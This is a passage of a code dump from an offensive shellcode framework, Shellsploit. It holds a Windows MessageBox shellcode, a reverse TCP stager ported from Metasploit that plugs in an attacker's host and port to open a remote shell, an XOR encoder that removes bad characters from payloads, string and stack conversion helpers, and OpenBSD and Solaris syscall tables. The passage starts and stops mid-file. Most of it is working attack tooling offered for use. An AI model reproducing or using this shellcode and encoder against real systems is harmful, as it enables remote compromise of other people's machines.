+= "89e2415152ffd7e886ffffff8b34af0" 33 | fill += "1c645813e4578697475f2817e045072" 34 | fill += "6f6375e98b7a2401c7668b2c6f8b7a1c" 35 | fill += "01c78b7caffc01c731c951ffd7" 36 | return "\\x"+"\\x".join(findall("..?", fill)) 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /shell/database/Windows/messagebox.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/37758/ 2 | 3 | #WORK tested. 4 | def messagebox( message=False): 5 | shellcode = r"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" 6 | shellcode += r"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" 7 | shellcode += r"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" 8 | shellcode += r"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" 9 | shellcode += r"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" 10 | shellcode += r"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" 11 | shellcode += r"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" 12 | shellcode += r"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" 13 | shellcode += r"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" 14 | shellcode += r"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" 15 | shellcode += r"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" 16 | shellcode += r"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" 17 | shellcode += r"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" 18 | shellcode += r"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" 19 | shellcode += r"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57" 20 | if message == False: 21 | #Hello World! 22 | shellcode += r"\x68\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68\x48\x65\x6c\x6c" 23 | else: 24 | shellcode += message 25 | shellcode += r"\x8b\xcc\x57\x57\x51\x57" 26 | shellcode += r"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" 27 | shellcode += r"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" 28 | shellcode += r"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0" 29 | return shellcode 30 | -------------------------------------------------------------------------------- /shell/database/Windows/rev_tcp.py: -------------------------------------------------------------------------------- 1 | # This is the reverse_tcp payload, completely ported from the Metasploit 2 | # Framework. 3 | # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/reverse_tcp.rb 4 | 5 | import binascii 6 | import socket 7 | from .xor import * 8 | 9 | 10 | class PayloadModule: 11 | def __init__(self, lhost, lport): 12 | self.lport = int(lport) 13 | self.lhost = lhost 14 | self.retries_offset = 192 15 | self.lhost_offset = 194 16 | self.lport_offset = 201 17 | self.exitfunc_offset = 226 18 | self.customized_shellcode = '' 19 | self.stager = ( 20 | "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + 21 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + 22 | "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + 23 | "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" + 24 | "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" + 25 | "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" + 26 | "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" + 27 | "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" + 28 | "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" + 29 | "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" + 30 | "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" + 31 | "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" + 32 | "\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" + 33 | "\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" + 34 | "\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" + 35 | "\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" + 36 | "\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" + 37 | "\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3") 38 | 39 | def gen_shellcode(self): 40 | # Take the passed in attributes and gen shellcode 41 | ip_shellcode = '' 42 | n = 2 43 | ip_shellcode_stage = binascii.hexlify(socket.inet_aton(self.lhost)) 44 | ip_shellcode_stage = [ip_shellcode_stage[i:i+n] for i in range(0, len(ip_shellcode_stage), n)] 45 | for two_bytes in ip_shellcode_stage: 46 | ip_shellcode += '\\x' + two_bytes 47 | 48 | # convert port to shellcode 49 | port_shellcode_stage = str(hex(self.lport).lstrip('0')) 50 | if len(port_shellcode_stage.lstrip('x')) == 3: 51 | # detect if odd number, is so, need to add a '0' to the front 52 | port_1half = '0' + port_shellcode_stage[0:2].lstrip('x') 53 | port_1half = '\\x' + port_1half 54 | port_2half = port_shellcode_stage[2:4] 55 | port_2half = '\\x' + port_2half 56 | port_shellcode = port_1half + port_2half 57 | elif len(port_shellcode_stage.lstrip('x')) == 4: 58 | port_1half = port_shellcode_stage[1:3] 59 | port_1half = '\\x' + port_1half 60 | port_2half = port_shellcode_stage[3:5] 61 | port_2half = '\\x' + port_2half 62 | port_shellcode = port_1half + port_2half 63 | elif len(port_shellcode_stage.lstrip('x')) == 2: 64 | port_1half = port_shellcode_stage[1:3].lstrip('x') 65 | port_1half = '\\x' + port_1half 66 | port_2half = '00' 67 | port_2half = '\\x' + port_2half 68 | port_shellcode = port_2half + port_1half 69 | elif len(port_shellcode_stage.lstrip('x')) == 1: 70 | port_1half = port_shellcode_stage.lstrip('x') 71 | port_1half = '\\x0' + port_1half 72 | port_2half = '\\x00' 73 | port_shellcode = port_2half + port_1half 74 | 75 | retries = '\x09' 76 | 77 | stager_shellcode = self.stager[0:self.retries_offset] 78 | stager_shellcode += retries 79 | stager_shellcode += self.stager[self.retries_offset + 1:self.lhost_offset] 80 | stager_shellcode += ip_shellcode.decode('string-escape') 81 | stager_shellcode += self.stager[self.lhost_offset + 4:self.lport_offset] 82 | stager_shellcode += port_shellcode.decode('string-escape') 83 | stager_shellcode += self.stager[self.lport_offset + 2:] 84 | 85 | self.customized_shellcode = "\\x" + '\\x'.join(stager_shellcode.encode('hex')[i:i+2] for i in range(0, len(stager_shellcode.encode('hex')), 2)) 86 | return EncoderModule(self.customized_shellcode).do_the_magic() 87 | 88 | 89 | -------------------------------------------------------------------------------- /shell/database/Windows/xor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This xor encoder was developed completely by Justin Warner (@sixdub) 4 | # Thanks a lot for letting us add this in! 5 | 6 | import re 7 | import sys 8 | 9 | 10 | class EncoderModule: 11 | def __init__(self, shellcode, bad_chars=r"\x00"): 12 | self.author = "Justin Warner (@sixdub)" 13 | self.xor_key = 0x00 14 | self.shellcode = bytearray(shellcode.replace("\\x", "").decode("hex")) 15 | self.terminator = 0x00 16 | self.encoded_shellcode = "" 17 | self.encoded_payload_length = 0 18 | self.encoder_bad_chars = ["eb", "18", "5e", "8d", "3e", "31", "c0", "db", "8a", "1c", "06", "80", "f3", "88", "1f", "47", "40", "ef", "e8", "e3", "ff"] 19 | self.bad_chars = bad_chars 20 | self.set_bad_characters(bad_chars) 21 | self.do_the_magic() 22 | 23 | def have_bad_chars(self, incoming, chars): 24 | for b in chars: 25 | if b in incoming: 26 | return True 27 | return False 28 | 29 | def shellcode_to_ascii(self, shell_code): 30 | output = "" 31 | for b in shell_code: 32 | output += "\\x%02x" % b 33 | return output 34 | 35 | 36 | 37 | def set_bad_characters(self, bad_characters): 38 | if bad_characters is not None: 39 | final_bad_chars = [] 40 | #bad_characters = bad_characters.split('x') 41 | bad_characters = bad_characters.split("\\x") 42 | bad_characters = bad_characters[1:] 43 | 44 | # Do some validation on the received characters 45 | for item in bad_characters: 46 | if item == '': 47 | pass 48 | else: 49 | if len(item) == 2: 50 | # Thanks rohan (@cptjesus) for providing this regex code, and making me too lazy 51 | # to do it myself 52 | rohan_re_code = re.compile('[a-f0-9]{2}',flags=re.IGNORECASE) 53 | if rohan_re_code.match(item): 54 | final_bad_chars.append(item) 55 | self.bad_chars = [int("0x"+x, 16) for x in final_bad_chars] 56 | 57 | 58 | # Takes a blob as input with a single byte key and returns blob output 59 | def xor(self, x, key): 60 | output = bytearray("") 61 | for b in bytearray(x): 62 | output.append(b ^ key) 63 | return output 64 | 65 | def do_the_magic(self): 66 | # This is where the encoding happens 67 | encode = bytearray("") 68 | 69 | # Test all possible keys and see if it creates a bad char. If not, we have a winner! 70 | remove_count = 0 71 | for test_key in range(1, 255): 72 | if not self.have_bad_chars(self.xor(self.shellcode, test_key), self.bad_chars): 73 | self.xor_key = test_key 74 | break 75 | else: 76 | remove_count += 1 77 | 78 | # Ensure a key was found... if not, error out 79 | if self.xor_key == 0x00: 80 | print "[*] ERROR: No key found... Stop being so picky and change your bad chars!" 81 | exit 82 | else: 83 | # XOR all the things 84 | # Justin, your code comments are awesome 85 | for x in bytearray(self.shellcode): 86 | encode.append(x ^ self.xor_key) 87 | skipped_term = 0 88 | 89 | # Iterate over code to find a non-used terminating char 90 | # that is not a badchar 91 | for i in range(1, 255): 92 | if i in bytearray(encode) or i in self.bad_chars: 93 | skipped_term += 1 94 | else: 95 | self.terminator = i 96 | break 97 | 98 | # Build final payload with stub 99 | encode.append(self.terminator) 100 | decodestub = bytearray("\xeb\x18\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb") 101 | decodestub.append(self.terminator) 102 | decodestub += bytearray("\x74\x0e\x80\xf3") 103 | decodestub.append(self.xor_key) 104 | decodestub += bytearray("\x88\x1f\x47\x40\xeb\xef\xe8\xe3\xff\xff\xff") 105 | complete = decodestub + encode 106 | self.encoded_payload_length = len(complete) 107 | 108 | #At this point, the shellcode is a byte array... now we convert to ASCII 109 | self.encoded_shellcode = self.shellcode_to_ascii(complete) 110 | return self.encoded_shellcode 111 | -------------------------------------------------------------------------------- /shell/database/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/__init__.py -------------------------------------------------------------------------------- /shell/database/stackconvert.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | 10 | from re import findall 11 | import codecs 12 | 13 | 14 | def plaintext( string): 15 | string = codecs.encode(str.encode(string), 'hex') 16 | string = string.decode('utf-8') 17 | db = findall("..?", string) 18 | return "\\x"+"\\x".join(db) 19 | 20 | 21 | def plaintextreverse( string): 22 | string = codecs.encode(str.encode(string), 'hex') 23 | string = string.decode('utf-8') 24 | db = findall("..?", string) 25 | return "\\x"+"\\x".join(db[::-1]) 26 | 27 | 28 | def PORT( port): 29 | db = [] 30 | fixmesempai = findall('..?', hex(int(port))[2:]) 31 | for x in fixmesempai: 32 | if len(x) == 1: 33 | x = "0"+x 34 | db.append(x) 35 | return "\\x"+"\\x".join(db) 36 | 37 | 38 | def IP( ip): 39 | #0x101017f : 127.1.1.1 40 | ip = str(ip).split(".") 41 | db = [] 42 | db2 = [] 43 | for x in ip: 44 | db.append(hex( int(x))[2:]) 45 | for x in db: 46 | if len(x) == 1: 47 | x = "0"+x 48 | db2.append(x) 49 | return "\\x"+"\\x".join(db2) 50 | 51 | 52 | def rawSTR( string): 53 | db = [] 54 | for x in string: 55 | first = codecs.encode(str.encode(x), 'hex') 56 | x = first.decode('utf-8') 57 | db.append("\\x"+x) 58 | return "".join(db) 59 | 60 | 61 | def ARM( string): 62 | db = [] 63 | if "/" in string: 64 | if len(string) % 4 == 0: 65 | string = string 66 | elif len(string) % 4 == 1: 67 | string = filler( string, 4) 68 | elif len(string) % 4 == 2: 69 | string = filler( string, 3) 70 | elif len(string) % 4 == 3: 71 | string = filler( string, 2) 72 | for x in range(0,len(string),4): 73 | db.append(ARMsplitter(string[x:x+4])) 74 | return "".join(db) 75 | 76 | 77 | def ARMsplitter( hexdump, pushdword="None"): 78 | db = [] 79 | if pushdword == "None": 80 | fixmesempai = findall('....?', hexdump) 81 | for x in fixmesempai[::-1]: 82 | first = codecs.encode(str.encode(x[::-1]), 'hex') 83 | first = first.decode('utf-8') 84 | second = findall("..?", first)[::-1] 85 | db.append("\\x"+"\\x".join(second)) 86 | return "".join(db) 87 | 88 | 89 | def stackconvertSTR( string, win=False): 90 | db = [] 91 | if len(string) == 1: 92 | string = codecs.encode(str.encode(string), 'hex') 93 | string = string.decode('utf-8') 94 | return r"\x6a"+r"\x"+string 95 | 96 | if "/" in string: 97 | if len(string) % 4 == 0: 98 | string = string 99 | elif len(string) % 4 == 1: 100 | string = filler( string, 4) 101 | elif len(string) % 4 == 2: 102 | string = filler( string, 3) 103 | elif len(string) % 4 == 3: 104 | string = filler( string, 2) 105 | for x in range(0,len(string),4): 106 | db.append(splitter(string[x:x+4])) 107 | return "".join(db[::-1]) 108 | #return "".join(db) 109 | 110 | #Linux_x86 111 | #68 PUSH DWORD 112 | #6668 PUSH WORD 113 | #6A PUSH BYTE 114 | if len(string) == 4: 115 | first = codecs.encode(str.encode(string[::-1]), 'hex') 116 | stack = first.decode('utf-8') 117 | data = findall("..?", stack) 118 | return "\\x68\\x"+"\\x".join(data) 119 | 120 | 121 | elif len(string) % 4 == 0: 122 | for x in range(0,len(string),4): 123 | db.append(splitter(string[x:x+4])) 124 | if win == True: 125 | return "".join(db[::-1]) #Windows 126 | else: 127 | return "".join(db) #Unix,Linux etc.. 128 | 129 | elif 2 < len(string) < 4: 130 | first = codecs.encode(str.encode(hexdump[::-1]), 'hex') 131 | first = first.decode('utf-8') 132 | second = findall("..?", first)[::-1] 133 | for x in second: 134 | db.append("\\x"+x) 135 | return "\\x66\\x68"+"".join(db) 136 | 137 | 138 | else: 139 | db = [] 140 | for x in range(0,len(string),4): 141 | if len(string[x:x+4]) == 4: 142 | db.append(splitter(string[x:x+4])) 143 | else: 144 | db.append(splitter(string[x:x+4], "WordTime")) 145 | if win == True: 146 | return "".join(db[::-1]) #Windows 147 | else: 148 | return "".join(db) #Unix,Linux etc..) 149 | 150 | 151 | def filler( string, number): 152 | string = [x for x in string] 153 | for x in range(0, len(string)): 154 | if string[x] == "/": 155 | string[x] = "/"*number 156 | break 157 | return "".join(string) 158 | 159 | 160 | def splitter( hexdump, pushdword="None"): 161 | db = [] 162 | if pushdword == "None": 163 | fixmesempai = findall('....?', hexdump) 164 | for x in fixmesempai[::-1]: 165 | first = codecs.encode(str.encode(x[::-1]), 'hex') 166 | first = first.decode('utf-8') 167 | second = findall("..?", first)[::-1] 168 | db.append("\\x"+"\\x".join(second)) 169 | return "\\x68"+"".join(db) 170 | 171 | else: 172 | #Byte .. 173 | if len(hexdump) == 1: 174 | string = codecs.encode(str.encode(hexdump), 'hex') 175 | string = string.decode('utf-8') 176 | return r"\x6a"+r"\x"+string 177 | else: 178 | first = codecs.encode(str.encode(hexdump[::-1]), 'hex') 179 | first = first.decode('utf-8') 180 | second = findall("..?", first)[::-1] 181 | for x in second: 182 | db.append("\\x"+x) 183 | return "\\x66\\x68"+"".join(db) 184 | 185 | 186 | -------------------------------------------------------------------------------- /shell/disassembly/Syscalls/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/disassembly/Syscalls/__init__.py -------------------------------------------------------------------------------- /shell/disassembly/Syscalls/openbsd_32.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | list = { 9 | "syscall":"0", 10 | "exit":"1", 11 | "fork":"2", 12 | "read":"3", 13 | "write":"4", 14 | "open":"5", 15 | "close":"6", 16 | "wait4":"7", 17 | "link":"9", 18 | "unlink":"10", 19 | "chdir":"12", 20 | "fchdir":"13", 21 | "mknod":"14", 22 | "chmod":"15", 23 | "chown":"16", 24 | "break":"17", 25 | "getpid":"20", 26 | "mount":"21", 27 | "unmount":"22", 28 | "setuid":"23", 29 | "getuid":"24", 30 | "geteuid":"25", 31 | "ptrace":"26", 32 | "recvmsg":"27", 33 | "sendmsg":"28", 34 | "recvfrom":"29", 35 | "accept":"30", 36 | "getpeername":"31", 37 | "getsockname":"32", 38 | "access":"33", 39 | "chflags":"34", 40 | "fchflags":"35", 41 | "sync":"36", 42 | "kill":"37", 43 | "getppid":"39", 44 | "dup":"41", 45 | "opipe":"42", 46 | "getegid":"43", 47 | "profil":"44", 48 | "ktrace":"45", 49 | "sigaction":"46", 50 | "getgid":"47", 51 | "sigprocmask":"48", 52 | "getlogin":"49", 53 | "setlogin":"50", 54 | "acct":"51", 55 | "sigpending":"52", 56 | "osigaltstack":"53", 57 | "ioctl":"54", 58 | "reboot":"55", 59 | "revoke":"56", 60 | "symlink":"57", 61 | "readlink":"58", 62 | "execve":"59", 63 | "umask":"60", 64 | "chroot":"61", 65 | "vfork":"66", 66 | "sbrk":"69", 67 | "sstk":"70", 68 | "vadvise":"72", 69 | "munmap":"73", 70 | "mprotect":"74", 71 | "madvise":"75", 72 | "mincore":"78", 73 | "getgroups":"79", 74 | "setgroups":"80", 75 | "getpgrp":"81", 76 | "setpgid":"82", 77 | "setitimer":"83", 78 | "getitimer":"86", 79 | "dup2":"90", 80 | "fcntl":"92", 81 | "select":"93", 82 | "fsync":"95", 83 | "setpriority":"96", 84 | "socket":"97", 85 | "connect":"98", 86 | "getpriority":"100", 87 | "sigreturn":"103", 88 | "bind":"104", 89 | "setsockopt":"105", 90 | "listen":"106", 91 | "sigsuspend":"111", 92 | "gettimeofday":"116", 93 | "getrusage":"117", 94 | "getsockopt":"118", 95 | "readv":"120", 96 | "writev":"121", 97 | "settimeofday":"122", 98 | "fchown":"123", 99 | "fchmod":"124", 100 | "setreuid":"126", 101 | "setregid":"127", 102 | "rename":"128", 103 | "flock":"131", 104 | "mkfifo":"132", 105 | "sendto":"133", 106 | "shutdown":"134", 107 | "socketpair":"135", 108 | "mkdir":"136", 109 | "rmdir":"137", 110 | "utimes":"138", 111 | "adjtime":"140", 112 | "setsid":"147", 113 | "quotactl":"148", 114 | "nfssvc":"155", 115 | "getfh":"161", 116 | "sysarch":"165", 117 | "pread":"173", 118 | "pwrite":"174", 119 | "setgid":"181", 120 | "setegid":"182", 121 | "seteuid":"183", 122 | "lfs_bmapv":"184", 123 | "lfs_markv":"185", 124 | "lfs_segclean":"186", 125 | "lfs_segwait":"187", 126 | "pathconf":"191", 127 | "fpathconf":"192", 128 | "swapctl":"193", 129 | "getrlimit":"194", 130 | "setrlimit":"195", 131 | "getdirentries":"196", 132 | "mmap":"197", 133 | "syscall":"198", 134 | "lseek":"199", 135 | "truncate":"200", 136 | "ftruncate":"201", 137 | "sysctl":"202", 138 | "mlock":"203", 139 | "munlock":"204", 140 | "futimes":"206", 141 | "getpgid":"207", 142 | "xfspioctl":"208", 143 | "semget":"221", 144 | "msgget":"225", 145 | "msgsnd":"226", 146 | "msgrcv":"227", 147 | "shmat":"228", 148 | "shmdt":"230", 149 | "clock_gettime":"232", 150 | "clock_settime":"233", 151 | "clock_getres":"234", 152 | "nanosleep":"240", 153 | "minherit":"250", 154 | "rfork":"251", 155 | "poll":"252", 156 | "issetugid":"253", 157 | "lchown":"254", 158 | "getsid":"255", 159 | "msync":"256", 160 | "getfsstat":"260", 161 | "statfs":"261", 162 | "fstatfs":"262", 163 | "pipe":"263", 164 | "fhopen":"264", 165 | "fhstatfs":"266", 166 | "preadv":"267", 167 | "pwritev":"268", 168 | "kqueue":"269", 169 | "kevent":"270", 170 | "mlockall":"271", 171 | "munlockall":"272", 172 | "getpeereid":"273", 173 | "getresuid":"281", 174 | "setresuid":"282", 175 | "getresgid":"283", 176 | "setresgid":"284", 177 | "mquery":"286", 178 | "closefrom":"287", 179 | "sigaltstack":"288", 180 | "shmget":"289", 181 | "semop":"290", 182 | "stat":"291", 183 | "fstat":"292", 184 | "lstat":"293", 185 | "fhstat":"294", 186 | "semctl":"295", 187 | "shmctl":"296", 188 | "msgctl":"297", 189 | "sched_yield":"298", 190 | "getthrid":"299", 191 | "thrsleep":"300", 192 | "thrwakeup":"301", 193 | "threxit":"302", 194 | "thrsigdivert":"303", 195 | "getcwd":"304", 196 | "adjfreq":"305", 197 | "MAXSYSCALL":"306", 198 | 199 | } 200 | 201 | #print list["execve"] 202 | #syscalls.master -------------------------------------------------------------------------------- /shell/disassembly/Syscalls/solaris_32.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | def SolarisSystemcall( sys, key=None): 9 | list = { 10 | "syscall":"0", 11 | "exit":"1", 12 | "forkall":"2", 13 | "read":"3", 14 | "write":"4", 15 | "open":"5", 16 | "close":"6", 17 | "wait":"7", 18 | "creat":"8", 19 | "link":"9", 20 | "unlink":"10", 21 | "exec":"11", 22 | "chdir":"12", 23 | "time":"13", 24 | "mknod":"14", 25 | "chmod":"15", 26 | "chown":"16", 27 | "brk":"17", 28 | "stat":"18", 29 | "lseek":"19", 30 | "getpid":"20", 31 | "mount":"21", 32 | "umount":"22", 33 | "setuid":"23", 34 | "getuid":"24", 35 | "stime":"25", 36 | "pcsample":"26", 37 | "alarm":"27", 38 | "fstat":"28", 39 | "pause":"29", 40 | "utime":"30", 41 | "stty":"31", 42 | "gtty":"32", 43 | "access":"33", 44 | "nice":"34", 45 | "statfs":"35", 46 | "sync":"36", 47 | "kill":"37", 48 | "fstatfs":"38", 49 | "pgrpsys":"39", 50 | "uucopystr":"40", 51 | "dup":"41", 52 | "pipe":"42", 53 | "times":"43", 54 | "profil":"44", 55 | "plock":"45", 56 | "setgid":"46", 57 | "getgid":"47", 58 | "signal":"48", 59 | "msgsys":"49", 60 | "sysi86":"50", 61 | "acct":"51", 62 | "shmsys":"52", 63 | "semsys":"53", 64 | "ioctl":"54", 65 | "uadmin":"55", 66 | "utssys":"57", 67 | "fdsync":"58", 68 | "execve":"59", 69 | "umask":"60", 70 | "chroot":"61", 71 | "fcntl":"62", 72 | "ulimit":"63", 73 | "reserved_64":"64", 74 | "reserved_65":"65", 75 | "reserved_66":"66", 76 | "reserved_67":"67", 77 | "reserved_68":"68", 78 | "reserved_69":"69", 79 | "tasksys":"70", 80 | "acctctl":"71", 81 | "exacctsys":"72", 82 | "getpagesizes":"73", 83 | "rctlsys":"74", 84 | "sidsys":"75", 85 | "fsat":"76", 86 | "lwp_park":"77", 87 | "sendfilev":"78", 88 | "rmdir":"79", 89 | "mkdir":"80", 90 | "getdents":"81", 91 | "privsys":"82", 92 | "ucredsys":"83", 93 | "sysfs":"84", 94 | "getmsg":"85", 95 | "putmsg":"86", 96 | "poll":"87", 97 | "lstat":"88", 98 | "symlink":"89", 99 | "readlink":"90", 100 | "setgroups":"91", 101 | "getgroups":"92", 102 | "fchmod":"93", 103 | "fchown":"94", 104 | "sigprocmask":"95", 105 | "sigsuspend":"96", 106 | "sigaltstack":"97", 107 | "sigaction":"98", 108 | "sigpending":"99", 109 | "context":"100", 110 | "evsys":"101", 111 | "evtrapret":"102", 112 | "statvfs":"103", 113 | "fstatvfs":"104", 114 | "getloadavg":"105", 115 | "nfssys":"106", 116 | "waitid":"107", 117 | "waitsys":"SYS_waitid", 118 | "sigsendsys":"108", 119 | "hrtsys":"109", 120 | "sigresend":"111", 121 | "priocntlsys":"112", 122 | "pathconf":"113", 123 | "mincore":"114", 124 | "mmap":"115", 125 | "mprotect":"116", 126 | "munmap":"117", 127 | "fpathconf":"118", 128 | "vfork":"119", 129 | "fchdir":"120", 130 | "readv":"121", 131 | "writev":"122", 132 | "xstat":"123", 133 | "lxstat":"124", 134 | "fxstat":"125", 135 | "xmknod":"126", 136 | "setrlimit":"128", 137 | "getrlimit":"129", 138 | "lchown":"130", 139 | "memcntl":"131", 140 | "getpmsg":"132", 141 | "putpmsg":"133", 142 | "rename":"134", 143 | "uname":"135", 144 | "setegid":"136", 145 | "sysconfig":"137", 146 | "adjtime":"138", 147 | "systeminfo":"139", 148 | "sharefs":"140", 149 | "seteuid":"141", 150 | "forksys":"142", 151 | "fork1":"143", 152 | "sigtimedwait":"144", 153 | "lwp_info":"145", 154 | "yield":"146", 155 | "lwp_sema_wait":"147", 156 | "lwp_sema_post":"148", 157 | "lwp_sema_trywait":"149", 158 | "lwp_detach":"150", 159 | "corectl":"151", 160 | "modctl":"152", 161 | "fchroot":"153", 162 | "utimes":"154", 163 | "vhangup":"155", 164 | "gettimeofday":"156", 165 | "getitimer":"157", 166 | "setitimer":"158", 167 | "lwp_create":"159", 168 | "lwp_exit":"160", 169 | "lwp_suspend":"161", 170 | "lwp_continue":"162", 171 | "lwp_kill":"163", 172 | "lwp_self":"164", 173 | "lwp_sigmask":"165", 174 | "lwp_private":"166", 175 | "lwp_wait":"167", 176 | "lwp_mutex_wakeup":"168", 177 | "lwp_mutex_lock":"169", 178 | "lwp_cond_wait":"170", 179 | "lwp_cond_signal":"171", 180 | "lwp_cond_broadcast":"172", 181 | "pread":"173", 182 | "pwrite":"174", 183 | "llseek":"175", 184 | "inst_sync":"176", 185 | "brand":"177", 186 | "kaio":"178", 187 | "cpc":"", 188 | "lgrpsys":"180", 189 | "meminfosys":"SYS_lgrpsys", 190 | "rusagesys":"181", 191 | "port":"182", 192 | "pollsys":"183", 193 | "labelsys":"184", 194 | "acl":"", 195 | "auditsys":"186", 196 | "processor_bind":"187", 197 | "processor_info":"188", 198 | "p_online":"189", 199 | "sigqueue":"190", 200 | "clock_gettime":"191", 201 | "clock_settime":"192", 202 | "clock_getres":"193", 203 | "timer_create":"194", 204 | "timer_delete":"195", 205 | "timer_settime":"196", 206 | "timer_gettime":"197", 207 | "timer_getoverrun":"198", 208 | "nanosleep":"199", 209 | "facl":"200", 210 | "door":"201", 211 | "setreuid":"202", 212 | "setregid":"203", 213 | "install_utrap":"204", 214 | "signotify":"205", 215 | "schedctl":"206", 216 | "pset":"207", 217 | "sparc_utrap_install":"208", 218 | "resolvepath":"209", 219 | "lwp_mutex_timedlock":"210", 220 | "lwp_sema_timedwait":"211", 221 | "lwp_rwlock_sys":"212", 222 | "getdents64":"213", 223 | "mmap64":"214", 224 | "stat64":"215", 225 | "lstat64":"216", 226 | "fstat64":"217", 227 | "statvfs64":"218", 228 | "fstatvfs64":"219", 229 | "setrlimit64":"220", 230 | "getrlimit64":"221", 231 | "pread64":"222", 232 | "pwrite64":"223", 233 | "creat64":"224", 234 | "open64":"225", 235 | "rpcsys":"226", 236 | "zone":"227", 237 | "autofssys":"228", 238 | "getcwd":"229", 239 | "so_socket":"230", 240 | "so_socketpair":"231", 241 | "bind":"232", 242 | "listen":"233", 243 | "accept":"234", 244 | "connect":"235", 245 | "shutdown":"236", 246 | "recv":"237", 247 | "recvfrom":"238", 248 | "recvmsg":"239", 249 | "send":"240", 250 | "sendmsg":"241", 251 | "sendto":"242", 252 | "getpeername":"243", 253 | "getsockname":"244", 254 | "getsockopt":"245", 255 | "setsockopt":"246", 256 | "sockconfig":"247", 257 | "ntp_gettime":"248", 258 | "ntp_adjtime":"249", 259 | "lwp_mutex_unlock":"250", 260 | "lwp_mutex_trylock":"251", 261 | "lwp_mutex_register":"252", 262 | "cladm":"253", 263 | "uucopy":"254", 264 | "umount2":"255" 265 | 266 | } 267 | 268 | if key == None: 269 | for key in list.keys(): 270 | if list[key] == sys: 271 | return key 272 | else: 273 | return hex(int(list[sys])).replace("0x", "") 274 | 275 | def SolarisInterrupted(): 276 | return "91" 277 | 278 | #print SolarisSystemcall( "execve", True) 279 | 280 | -------------------------------------------------------------------------------- /shell/disassembly/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/disassembly/__init__.py -------------------------------------------------------------------------------- /shell/disassembly/capstoneheader.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans 